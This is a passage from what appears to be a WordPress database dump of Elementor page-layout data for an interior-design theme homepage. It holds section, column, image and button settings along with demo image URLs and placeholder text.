izes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4252,4925,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4253,4925,'_elementor_pro_version','3.8.1'),(4254,4926,'_wp_page_template','elementor_header_footer'),(4255,4926,'_elementor_edit_mode','builder'),(4256,4926,'_elementor_template_type','wp-page'),(4257,4926,'_elementor_version','3.8.1'),(4258,4926,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"s